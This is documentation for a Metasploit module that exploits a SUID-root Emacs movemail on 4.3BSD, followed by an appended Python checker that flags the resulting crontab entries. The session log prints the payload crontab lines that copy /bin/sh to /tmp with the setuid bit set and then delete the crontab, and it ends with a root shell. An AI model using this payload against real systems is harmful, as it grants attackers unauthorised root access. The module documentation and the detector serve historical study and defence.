This module exploits a SUID installation of the Emacs movemail utility
to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
A Docker environment for 4.3BSD on VAX is available at https://github.com/wvu/ye-olde-bsd.
Id  Name
--  ----
0   /usr/lib/crontab.local
Set this to the absolute path to the SUID-root
If your payload is
cmd/unix/generic (suggested default), set this to
the command you want to run as root. The provided default will create a
SUID-root shell at /tmp/sh.
msf5 exploit(unix/local/emacs_movemail) > run

[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
[*] Current shell is /bin/sh
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
[+] SUID-root [redacted] found
[*] Preparing crontab with payload
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
* * * * * root rm -f /usr/lib/crontab.local
[*] Creating writable /usr/lib/crontab.local
[+] Writing crontab to /usr/lib/crontab.local
[!] Please wait at least one minute for effect
[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/emacs_movemail) > sessions -1
[*] Starting interaction with 1...

ls -l /usr/lib/crontab.local /tmp/sh
/usr/lib/crontab.local not found
-rwsr-xr-x 1 root 23552 Nov 22 15:17 /tmp/sh
/tmp/sh -c whoami
root
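
A defender-side check for the crontab entries shown in the session above, as an added example that is not part of the Metasploit module or its documentation. It flags root jobs that set the setuid bit or delete their own crontab; the function names and the first sample line are assumptions made for illustration.

```python
import re

# Assumption: system crontab lines are "min hour dom mon dow user command",
# the layout of the two payload lines in the session above.
CRONTAB_PATH = "/usr/lib/crontab.local"

# Constructed sample: line 1 is a constructed benign job; lines 2-3 are the
# payload entries printed by the module run above.
SAMPLE = "\n".join([
    "0,15,30,45 * * * * root /usr/lib/atrun",
    "* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh",
    "* * * * * root rm -f /usr/lib/crontab.local",
])

def sets_setuid(mode):
    """True if a chmod mode argument (octal or symbolic) turns on setuid."""
    if re.fullmatch(r"0?[4567][0-7]{3}", mode):
        return True
    for clause in mode.split(","):
        m = re.match(r"([ugoa]*)[+=][rwxXt]*s", clause)
        if m and (not m.group(1) or set(m.group(1)) & {"u", "a"}):
            return True
    return False

def audit_crontab(text, path=CRONTAB_PATH):
    """Return (line_number, reason) pairs for root jobs that need triage."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            findings.append((n, "malformed entry"))
            continue
        if fields[5] != "root":
            continue
        # Look at each simple command in the job separately.
        for part in re.split(r"&&|\|\||;|\|", fields[6]):
            argv = part.split()
            if not argv:
                continue
            prog = argv[0].rsplit("/", 1)[-1]
            args = [a for a in argv[1:] if not a.startswith("-")]
            if prog == "chmod" and args and sets_setuid(args[0]):
                findings.append((n, "root job sets the setuid bit"))
            elif prog == "rm" and path in args:
                findings.append((n, "root job deletes its own crontab"))
    return findings
```

Calling audit_crontab(SAMPLE) reports lines 2 and 3. Because the second payload entry removes the crontab within a minute, the SUID-root copy of the shell left in /tmp is the artifact that persists for later inspection.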